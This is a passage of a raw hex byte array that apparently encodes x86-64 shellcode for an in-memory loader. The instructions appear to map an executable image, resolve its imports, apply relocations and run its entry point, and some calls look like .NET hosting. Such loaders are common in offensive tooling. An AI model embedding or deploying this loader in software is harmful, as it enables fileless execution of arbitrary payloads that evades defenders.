406 0xca, 0x8a, 0x04, 0x1a, 0x84, 0xc0, 0x75, 0xe1, 0x85, 0xd2, 0x74, 0x1b,
407 0x8d, 0x4a, 0x01, 0xc6, 0x84, 0x14, 0x80, 0x00, 0x00, 0x00, 0x00, 0x48,
408 0x03, 0xd9, 0x48, 0x8d, 0x8c, 0x24, 0x80, 0x00, 0x00, 0x00, 0xff, 0x56,
409 0x30, 0xeb, 0xb8, 0x41, 0x8b, 0xfd, 0x44, 0x39, 0xae, 0x40, 0x02, 0x00,
410 0x00, 0x76, 0x2c, 0x4c, 0x8b, 0x46, 0x28, 0x48, 0x8b, 0xce, 0x8b, 0xdf,
411 0x48, 0x8b, 0x54, 0xde, 0x30, 0xe8, 0xe2, 0x10, 0x00, 0x00, 0x48, 0x89,
412 0x44, 0xde, 0x30, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xfe, 0x01, 0x00, 0x00,
413 0x41, 0x03, 0xfd, 0x3b, 0xbe, 0x40, 0x02, 0x00, 0x00, 0x72, 0xd4, 0x8b,
414 0x86, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x19, 0x48, 0x8b,
415 0xce, 0xe8, 0x0e, 0xf2, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xd8, 0x01,
416 0x00, 0x00, 0x48, 0x8b, 0x9e, 0x20, 0x09, 0x00, 0x00, 0xeb, 0x1d, 0x83,
417 0xf8, 0x03, 0x0f, 0x84, 0xc6, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x9e, 0x20,
418 0x09, 0x00, 0x00, 0x41, 0x3b, 0xc5, 0x74, 0x08, 0x48, 0x8b, 0x9c, 0x24,
419 0xd0, 0x01, 0x00, 0x00, 0x44, 0x39, 0xae, 0x6c, 0x05, 0x00, 0x00, 0x74,
420 0x32, 0x48, 0x8b, 0xce, 0xe8, 0x9f, 0xef, 0xff, 0xff, 0x85, 0xc0, 0x75,
421 0x0d, 0x83, 0xbe, 0x6c, 0x05, 0x00, 0x00, 0x02, 0x0f, 0x84, 0x90, 0x01,
422 0x00, 0x00, 0x48, 0x8b, 0xce, 0xe8, 0x9e, 0xf0, 0xff, 0xff, 0x85, 0xc0,
423 0x75, 0x0d, 0x83, 0xbe, 0x6c, 0x05, 0x00, 0x00, 0x02, 0x0f, 0x84, 0x77,
424 0x01, 0x00, 0x00, 0x44, 0x39, 0x6b, 0x08, 0x0f, 0x84, 0x08, 0x01, 0x00,
425 0x00, 0x8b, 0x93, 0x24, 0x05, 0x00, 0x00, 0xbf, 0x30, 0x05, 0x00, 0x00,
426 0x48, 0x03, 0xd7, 0x44, 0x8b, 0xcd, 0x33, 0xc9, 0x41, 0xb8, 0x00, 0x30,
427 0x00, 0x00, 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xe8, 0x48, 0x85, 0xc0, 0x0f,
428 0x84, 0x45, 0x01, 0x00, 0x00, 0x44, 0x8b, 0xc7, 0x48, 0x8b, 0xd3, 0x48,
429 0x8b, 0xc8, 0xe8, 0x61, 0x15, 0x00, 0x00, 0x8b, 0x43, 0x08, 0x8d, 0x48,
430 0xfd, 0x83, 0xf9, 0x02, 0x76, 0x21, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0xbe,
431 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x28, 0x05, 0x00, 0x00, 0x48, 0x8d,
432 0x8b, 0x28, 0x05, 0x00, 0x00, 0xe8, 0xbe, 0x12, 0x00, 0x00, 0xe9, 0xa3,
433 0x00, 0x00, 0x00, 0x0f, 0xb7, 0xc8, 0x4c, 0x8d, 0x84, 0x24, 0xd8, 0x01,
434 0x00, 0x00, 0x66, 0x41, 0x2b, 0xcd, 0x48, 0x8d, 0x94, 0x24, 0xd0, 0x01,
435 0x00, 0x00, 0xb8, 0x00, 0x01, 0x00, 0x00, 0x66, 0x0b, 0xc8, 0xff, 0x96,
436 0x98, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xde, 0x00, 0x00, 0x00,
437 0x8b, 0x94, 0x24, 0xd0, 0x01, 0x00, 0x00, 0x44, 0x8d, 0x48, 0x04, 0x33,
438 0xc9, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0x41, 0xff, 0xd4, 0x44, 0x8b,
439 0x83, 0x20, 0x05, 0x00, 0x00, 0x4c, 0x8d, 0x8b, 0x28, 0x05, 0x00, 0x00,
440 0x0f, 0xb7, 0x4b, 0x08, 0x48, 0x8d, 0x95, 0x28, 0x05, 0x00, 0x00, 0x48,
441 0x8b, 0xf8, 0x66, 0x41, 0x2b, 0xcd, 0xb8, 0x00, 0x01, 0x00, 0x00, 0x48,
442 0x89, 0x7c, 0x24, 0x30, 0x66, 0x0b, 0xc8, 0x48, 0x8d, 0x84, 0x24, 0xe0,
443 0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x28, 0x44, 0x89, 0x44, 0x24,
444 0x20, 0x44, 0x8b, 0x83, 0x24, 0x05, 0x00, 0x00, 0xff, 0x96, 0xa0, 0x01,
445 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x48, 0x8b,
446 0xcf, 0x8b, 0xd8, 0x41, 0xff, 0xd7, 0x85, 0xdb, 0x75, 0x68, 0x48, 0x8b,
447 0xdd, 0x8b, 0x0b, 0x8d, 0x41, 0xfd, 0x41, 0x3b, 0xc5, 0x76, 0x50, 0x8d,
448 0x41, 0xff, 0x41, 0x3b, 0xc5, 0x76, 0x15, 0x8d, 0x41, 0xfb, 0x41, 0x3b,
449 0xc5, 0x77, 0x4b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xce, 0xe8, 0x76, 0x09,
450 0x00, 0x00, 0xeb, 0x3e, 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x48, 0x8b, 0xd3,
451 0x48, 0x8b, 0xce, 0xe8, 0x3c, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10,
452 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xce, 0xe8,
453 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8b, 0xce,
454 0xe8, 0xbb, 0xf4, 0xff, 0xff, 0xeb, 0x0b, 0x48, 0x8b, 0xd3, 0x48, 0x8b,
455 0xce, 0xe8, 0xae, 0x04, 0x00, 0x00, 0x8b, 0x86, 0xe4, 0x06, 0x00, 0x00,
456 0x83, 0xe8, 0x02, 0x41, 0x3b, 0xc5, 0x77, 0x34, 0x48, 0x8b, 0x8e, 0x20,
457 0x09, 0x00, 0x00, 0x48, 0x85, 0xc9, 0x74, 0x28, 0x44, 0x8b, 0x86, 0x18,
458 0x09, 0x00, 0x00, 0x33, 0xd2, 0xe8, 0x22, 0x14, 0x00, 0x00, 0x48, 0x8b,
459 0x8e, 0x20, 0x09, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00,
460 0x00, 0x41, 0xff, 0xd7, 0x48, 0x83, 0xa6, 0x20, 0x09, 0x00, 0x00, 0x00,
461 0x44, 0x8b, 0x06, 0x33, 0xd2, 0x8b, 0x9e, 0x30, 0x02, 0x00, 0x00, 0x48,
462 0x8b, 0xce, 0xe8, 0xf5, 0x13, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00,
463 0xc0, 0x00, 0x00, 0x48, 0x8b, 0xce, 0x41, 0xff, 0xd7, 0x83, 0xfb, 0x02,
464 0x75, 0x05, 0x33, 0xc9, 0x41, 0xff, 0xd6, 0x33, 0xc0, 0xe9, 0x72, 0xfc,
465 0xff, 0xff, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x55, 0x56, 0x57,
466 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0xac, 0x24,
467 0xe0, 0xfd, 0xff, 0xff, 0x48, 0x81, 0xec, 0x20, 0x03, 0x00, 0x00, 0x45,
468 0x33, 0xed, 0x33, 0xc0, 0x83, 0x3a, 0x02, 0x0f, 0x57, 0xc0, 0x4d, 0x8b,
469 0xf0, 0x4c, 0x89, 0x6c, 0x24, 0x50, 0x48, 0x8b, 0xf2, 0x48, 0x89, 0x45,
470 0x88, 0x45, 0x8d, 0x7d, 0x01, 0x66, 0x44, 0x89, 0xad, 0x68, 0x02, 0x00,
471 0x00, 0x48, 0x8b, 0xd9, 0x41, 0x8b, 0xfd, 0x0f, 0x11, 0x44, 0x24, 0x78,
472 0x0f, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x48, 0x28, 0x49, 0x8d,
473 0x50, 0x38, 0x48, 0x8b, 0x01, 0xff, 0x90, 0x80, 0x00, 0x00, 0x00, 0x85,
474 0xc0, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x38, 0x48,
475 0x8d, 0x54, 0x24, 0x50, 0x48, 0x8b, 0x01, 0xff, 0x90, 0x90, 0x00, 0x00,
476 0x00, 0x85, 0xc0, 0x0f, 0x88, 0x91, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4c,
477 0x24, 0x50, 0x4c, 0x8d, 0x44, 0x24, 0x48, 0x41, 0x8b, 0xd7, 0xff, 0x93,
478 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c, 0x24, 0x50, 0x4c, 0x8d, 0x44,
479 0x24, 0x44, 0x41, 0x8b, 0xd7, 0xff, 0x93, 0xd0, 0x00, 0x00, 0x00, 0x8b,
480 0x44, 0x24, 0x44, 0x2b, 0x44, 0x24, 0x48, 0x41, 0x03, 0xc7, 0x0f, 0x84,
481 0x2e, 0x01, 0x00, 0x00, 0x41, 0x8d, 0x4d, 0x0c, 0x45, 0x8b, 0xc7, 0x33,
482 0xd2, 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x86, 0x0c, 0x04,
483 0x00, 0x00, 0x33, 0xd2, 0x48, 0x8b, 0xf8, 0x45, 0x38, 0x28, 0x0f, 0x84,
484 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x41, 0xbf, 0x00, 0x01,
485 0x00, 0x00, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x41, 0x83, 0xc9, 0xff, 0x33,
486 0xc9, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x54,
487 0x24, 0x40, 0x48, 0x8d, 0x4d, 0x10, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00,
488 0x44, 0x8b, 0x44, 0x24, 0x40, 0xb9, 0x08, 0x20, 0x00, 0x00, 0x66, 0x89,
489 0x4c, 0x24, 0x60, 0x33, 0xd2, 0x41, 0x8d, 0x4d, 0x08, 0x4c, 0x8b, 0xf8,
490 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xcd, 0x89, 0x8d, 0x78,
491 0x02, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x68, 0x44, 0x39, 0x6c, 0x24,
492 0x40, 0x0f, 0x86, 0x85, 0x00, 0x00, 0x00, 0x45, 0x8d, 0x65, 0x01, 0x49,
493 0x8b, 0x0c, 0xcf, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c,
494 0x24, 0x68, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xc0,
495 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x78, 0x02, 0x00, 0x00,
496 0x41, 0x03, 0xcc, 0x89, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x3b, 0x4c, 0x24,
497 0x40, 0x72, 0xcc, 0x45, 0x8b, 0xfc, 0xeb, 0x4e, 0xb9, 0x08, 0x20, 0x00,
498 0x00, 0x45, 0x8b, 0xc7, 0x66, 0x89, 0x4c, 0x24, 0x60, 0xb9, 0x08, 0x00,
499 0x00, 0x00, 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x68,
500 0x02, 0x00, 0x00, 0x44, 0x89, 0xad, 0x78, 0x02, 0x00, 0x00, 0x48, 0x89,
501 0x44, 0x24, 0x68, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c,
502 0x24, 0x68, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xc0,
503 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xbf, 0x01, 0x00,
504 0x00, 0x00, 0x4c, 0x8d, 0x44, 0x24, 0x60, 0x44, 0x89, 0xad, 0x78, 0x02,
505 0x00, 0x00, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x48, 0x8b, 0xcf,
506 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x38, 0x4c, 0x8d,
507 0x4d, 0xd8, 0xf2, 0x0f, 0x10, 0x4d, 0x88, 0x48, 0x8d, 0x55, 0xa0, 0x66,
508 0x44, 0x89, 0x7c, 0x24, 0x78, 0x4c, 0x8b, 0xc7, 0x4c, 0x89, 0x6d, 0x80,
509 0x0f, 0x10, 0x44, 0x24, 0x78, 0x48, 0x8b, 0x01, 0xf2, 0x0f, 0x11, 0x4d,
510 0xb0, 0x0f, 0x29, 0x45, 0xa0, 0xff, 0x90, 0x28, 0x01, 0x00, 0x00, 0x48,
511 0x85, 0xff, 0x0f, 0x84, 0xee, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x4c, 0x24,
512 0x68, 0xff, 0x93, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x93,
513 0xc0, 0x00, 0x00, 0x00, 0xe9, 0xd5, 0x01, 0x00, 0x00, 0x4d, 0x89, 0x6e,
514 0x38, 0xe9, 0xcc, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x0c, 0x02, 0x00,
515 0x00, 0x41, 0xbf, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44,
516 0x89, 0x7c, 0x24, 0x28, 0x41, 0x83, 0xcc, 0xff, 0x48, 0x89, 0x44, 0x24,
517 0x20, 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x53, 0x70, 0x48,
518 0x8d, 0x4d, 0x10, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44,
519 0x24, 0x58, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x8b, 0x01,
520 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x4c,
521 0x8d, 0x86, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x45,
522 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x4d,
523 0x10, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xe8, 0x48, 0x85,
524 0xc0, 0x0f, 0x84, 0x44, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x28, 0x49,
525 0x8d, 0x46, 0x30, 0x4c, 0x8b, 0xc0, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8b,
526 0xd7, 0x4c, 0x8b, 0x09, 0x41, 0xff, 0x91, 0x88, 0x00, 0x00, 0x00, 0x44,
527 0x8b, 0xf0, 0x85, 0xc0, 0x0f, 0x88, 0x14, 0x01, 0x00, 0x00, 0x33, 0xff,
528 0x4c, 0x8d, 0x86, 0x0c, 0x04, 0x00, 0x00, 0x41, 0x38, 0x38, 0x0f, 0x84,
529 0xa6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44, 0x89, 0x7c, 0x24,
530 0x28, 0x45, 0x8b, 0xcc, 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33,
531 0xc9, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8d, 0x4d,
532 0x10, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x40,
533 0x8d, 0x4f, 0x0c, 0x33, 0xd2, 0x4c, 0x8b, 0xf8, 0xff, 0x93, 0xb0, 0x00,
534 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x74, 0x64, 0x83, 0xa5,
535 0x78, 0x02, 0x00, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x40, 0x00, 0x76, 0x56,
536 0x33, 0xc9, 0x8d, 0x71, 0x08, 0x44, 0x8d, 0x61, 0x01, 0x49, 0x8b, 0x0c,
537 0xcf, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x45, 0xc0, 0x66,
538 0x89, 0x75, 0xc0, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x48, 0x89,
539 0x45, 0xc8, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x44,
540 0x8b, 0xf0, 0x85, 0xc0, 0x79, 0x0b, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0xc0,
541 0x00, 0x00, 0x00, 0x33, 0xff, 0x8b, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x41,
542 0x03, 0xcc, 0x89, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x3b, 0x4c, 0x24, 0x40,
543 0x72, 0xb3, 0x45, 0x85, 0xf6, 0x78, 0x52, 0x48, 0x8b, 0x4d, 0x90, 0x48,
544 0x8d, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x30, 0x0f, 0x57, 0xc0, 0x48,
545 0x8d, 0x55, 0xa0, 0x0f, 0x29, 0x45, 0xa0, 0xf2, 0x0f, 0x10, 0x45, 0x88,
546 0x45, 0x33, 0xc9, 0x48, 0x8b, 0x09, 0x41, 0xb8, 0x18, 0x01, 0x00, 0x00,
547 0x48, 0x89, 0x7c, 0x24, 0x28, 0x48, 0x89, 0x54, 0x24, 0x20, 0x49, 0x8b,
548 0xd5, 0xf2, 0x0f, 0x11, 0x45, 0xb0, 0x48, 0x8b, 0x01, 0xff, 0x90, 0xc8,
549 0x01, 0x00, 0x00, 0x48, 0x85, 0xff, 0x74, 0x09, 0x48, 0x8b, 0xcf, 0xff,
550 0x93, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x7c, 0x24, 0x58, 0x49, 0x8b,
551 0xcd, 0xff, 0x93, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x93,
552 0xe0, 0x00, 0x00, 0x00, 0x41, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x41, 0x8b,
553 0xc7, 0x48, 0x8b, 0x9c, 0x24, 0x60, 0x03, 0x00, 0x00, 0x48, 0x81, 0xc4,
554 0x20, 0x03, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c,
555 0x5f, 0x5e, 0x5d, 0xc3, 0x48, 0x89, 0x54, 0x24, 0x10, 0x53, 0x55, 0x56,
556 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec,
557 0x58, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0xaa, 0x28, 0x05, 0x00, 0x00, 0x48,
558 0x8b, 0xf1, 0x49, 0x63, 0x7d, 0x3c, 0x45, 0x33, 0xe4, 0x49, 0x03, 0xfd,
559 0x4c, 0x89, 0xa4, 0x24, 0xb8, 0x02, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x89,
560 0xbc, 0x24, 0xa0, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xfa, 0x4c, 0x89, 0x6c,
561 0x24, 0x30, 0xff, 0x56, 0x40, 0x48, 0x89, 0x84, 0x24, 0xb0, 0x02, 0x00,
562 0x00, 0x4c, 0x63, 0x40, 0x3c, 0x45, 0x0f, 0xb7, 0x4c, 0x00, 0x04, 0x66,
563 0x44, 0x39, 0x4f, 0x04, 0x0f, 0x85, 0x0b, 0x04, 0x00, 0x00, 0x8b, 0x57,
564 0x50, 0x45, 0x8d, 0x4c, 0x24, 0x40, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x33,
565 0xc9, 0x03, 0xd0, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xff, 0x56, 0x48,
566 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe5, 0x03, 0x00, 0x00,
567 0x44, 0x8b, 0x47, 0x54, 0x49, 0x8b, 0xd5, 0x48, 0x8b, 0xc8, 0xe8, 0xe1,
568 0x0e, 0x00, 0x00, 0x0f, 0xb7, 0x6f, 0x14, 0x45, 0x8b, 0xf4, 0x48, 0x03,
569 0xef, 0x66, 0x44, 0x3b, 0x67, 0x06, 0x73, 0x2d, 0x41, 0x8b, 0xc6, 0x4c,
570 0x8d, 0x04, 0x80, 0x42, 0x8b, 0x54, 0xc5, 0x2c, 0x42, 0x8b, 0x4c, 0xc5,
571 0x24, 0x49, 0x03, 0xd5, 0x46, 0x8b, 0x44, 0xc5, 0x28, 0x48, 0x03, 0xcb,
572 0xe8, 0xaf, 0x0e, 0x00, 0x00, 0x0f, 0xb7, 0x47, 0x06, 0x41, 0xff, 0xc6,
573 0x44, 0x3b, 0xf0, 0x72, 0xd3, 0x8b, 0x87, 0xb0, 0x00, 0x00, 0x00, 0x85,
574 0xc0, 0x74, 0x76, 0x4c, 0x8b, 0xf3, 0x4c, 0x8d, 0x0c, 0x03, 0x4c, 0x2b,
575 0x77, 0x30, 0x45, 0x39, 0x21, 0x74, 0x66, 0xbd, 0x00, 0x10, 0x00, 0x00,
576 0x4d, 0x8d, 0x51, 0x08, 0xeb, 0x47, 0x41, 0x0f, 0xb7, 0x02, 0xb9, 0x00,
577 0xf0, 0x00, 0x00, 0x44, 0x0f, 0xb7, 0xd8, 0x66, 0x23, 0xc1, 0xb9, 0x00,
578 0xa0, 0x00, 0x00, 0x66, 0x3b, 0xc1, 0x75, 0x1f, 0x45, 0x8b, 0x01, 0x41,
579 0x81, 0xe3, 0xff, 0x0f, 0x00, 0x00, 0x4b, 0x8d, 0x04, 0x03, 0x48, 0x8b,
580 0x14, 0x18, 0x4b, 0x8d, 0x04, 0x03, 0x49, 0x03, 0xd6, 0x48, 0x89, 0x14,
581 0x18, 0xeb, 0x0a, 0x66, 0x44, 0x3b, 0xdd, 0x0f, 0x83, 0x22, 0x03, 0x00,
582 0x00, 0x49, 0x83, 0xc2, 0x02, 0x41, 0x8b, 0x41, 0x04, 0x49, 0x03, 0xc1,
583 0x4c, 0x3b, 0xd0, 0x75, 0xad, 0x4d, 0x8b, 0xca, 0x45, 0x39, 0x22, 0x75,
584 0x9f, 0x8b, 0x87, 0x90, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x98,
585 0x00, 0x00, 0x00, 0x48, 0x8d, 0x2c, 0x03, 0x8b, 0x45, 0x0c, 0x85, 0xc0,
586 0x0f, 0x84, 0x89, 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x48, 0x03, 0xcb, 0xff,
587 0x56, 0x30, 0x44, 0x8b, 0x75, 0x00, 0x48, 0x8b, 0xf8, 0x44, 0x8b, 0x6d,
588 0x10, 0x4c, 0x03, 0xf3, 0x4c, 0x03, 0xeb, 0xeb, 0x4c, 0x79, 0x0b, 0x0f,
589 0xb7, 0xd1, 0x48, 0x8b, 0xcf, 0xff, 0x56, 0x38, 0xeb, 0x33, 0x41, 0x83,
590 0x7f, 0x04, 0x00, 0x4c, 0x8d, 0x24, 0x19, 0x74, 0x1a, 0x49, 0x8d, 0x54,
591 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0xca, 0xf2, 0xff, 0xff, 0x85, 0xc0,
592 0x74, 0x09, 0x48, 0x8b, 0x86, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x49,
593 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xcf, 0xff, 0x56, 0x38, 0x45, 0x33,
594 0xe4, 0x49, 0x83, 0xc6, 0x08, 0x49, 0x89, 0x45, 0x00, 0x49, 0x83, 0xc5,
595 0x08, 0x49, 0x8b, 0x0e, 0x48, 0x85, 0xc9, 0x75, 0xac, 0x8b, 0x45, 0x20,
596 0x48, 0x83, 0xc5, 0x14, 0x85, 0xc0, 0x75, 0x86, 0x48, 0x8b, 0xbc, 0x24,
597 0xa0, 0x02, 0x00, 0x00, 0x4d, 0x8d, 0xaf, 0x28, 0x05, 0x00, 0x00, 0x8b,
598 0x87, 0xf0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x72, 0x4c, 0x8d, 0x73,
599 0x04, 0x4c, 0x03, 0xf0, 0x41, 0x8b, 0x06, 0x85, 0xc0, 0x74, 0x64, 0x8b,
600 0xc8, 0x48, 0x03, 0xcb, 0xff, 0x56, 0x30, 0x4c, 0x8b, 0xe0, 0x48, 0x85,
601 0xc0, 0x74, 0x3e, 0x45, 0x8b, 0x7e, 0x0c, 0x41, 0x8b, 0x6e, 0x08, 0x4c,
602 0x03, 0xfb, 0x48, 0x03, 0xeb, 0xeb, 0x26, 0x48, 0x8b, 0x46, 0x38, 0x48,
603 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xd1, 0xeb, 0x07, 0x48, 0x8d, 0x53,
604 0x02, 0x48, 0x03, 0xd1, 0x49, 0x8b, 0xcc, 0xff, 0xd0, 0x49, 0x83, 0xc7,
605 0x08, 0x48, 0x89, 0x45, 0x00, 0x48, 0x83, 0xc5, 0x08, 0x49, 0x8b, 0x0f,
606 0x48, 0x85, 0xc9, 0x75, 0xd2, 0x49, 0x83, 0xc6, 0x20, 0x45, 0x33, 0xe4,
607 0x41, 0x8b, 0x06, 0x85, 0xc0, 0x75, 0xa4, 0x4c, 0x8b, 0xbc, 0x24, 0xa8,
608 0x02, 0x00, 0x00, 0x8b, 0x87, 0xd0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74,
609 0x24, 0x4c, 0x8b, 0x74, 0x18, 0x18, 0x4d, 0x85, 0xf6, 0x74, 0x1a, 0xeb,
610 0x10, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xcb, 0x41, 0x8d, 0x50, 0x01, 0xff,
611 0xd0, 0x4d, 0x8d, 0x76, 0x08, 0x49, 0x8b, 0x06, 0x48, 0x85, 0xc0, 0x75,
612 0xe8, 0x8b, 0x6f, 0x28, 0x48, 0x03, 0xeb, 0x41, 0x83, 0x3f, 0x03, 0x0f,
613 0x85, 0x16, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8c, 0x24, 0xb0, 0x02, 0x00,
614 0x00, 0x45, 0x33, 0xc0, 0x41, 0x8d, 0x50, 0x01, 0xff, 0xd5, 0x49, 0x8d,
615 0x97, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x89, 0x94, 0x24, 0xa0, 0x02, 0x00,
616 0x00, 0x44, 0x38, 0x22, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0x8b, 0x87,
617 0x88, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x73, 0x01, 0x00, 0x00,
618 0x48, 0x03, 0xc3, 0x8b, 0x68, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x65, 0x01,
619 0x00, 0x00, 0x44, 0x8b, 0x70, 0x1c, 0x44, 0x8b, 0x60, 0x20, 0x4c, 0x03,
620 0xf3, 0x44, 0x8b, 0x78, 0x24, 0x4c, 0x03, 0xe3, 0x4c, 0x03, 0xfb, 0xff,
621 0xcd, 0x41, 0x8b, 0x0c, 0xac, 0x48, 0x03, 0xcb, 0xe8, 0x97, 0x0c, 0x00,
622 0x00, 0x85, 0xc0, 0x74, 0x0e, 0x85, 0xed, 0x74, 0x18, 0x48, 0x8b, 0x94,
623 0x24, 0xa0, 0x02, 0x00, 0x00, 0xeb, 0xe0, 0x41, 0x0f, 0xb7, 0x04, 0x6f,
624 0x45, 0x8b, 0x34, 0x86, 0x4c, 0x03, 0xf3, 0xeb, 0x08, 0x4c, 0x8b, 0xb4,
625 0x24, 0xb8, 0x02, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x48,
626 0x8b, 0xcb, 0xe8, 0x45, 0x0c, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33,
627 0xd2, 0x48, 0x8b, 0x4c, 0x24, 0x30, 0xe8, 0x35, 0x0c, 0x00, 0x00, 0x4d,
628 0x85, 0xf6, 0x0f, 0x84, 0xf3, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xac, 0x24,
629 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xbd, 0x0c, 0x04, 0x00, 0x00, 0x80,
630 0x3f, 0x00, 0x74, 0x43, 0x8b, 0x85, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0,
631 0x74, 0x26, 0x48, 0x8d, 0x44, 0x24, 0x40, 0xc7, 0x44, 0x24, 0x28, 0x00,
632 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x44, 0x24, 0x20,
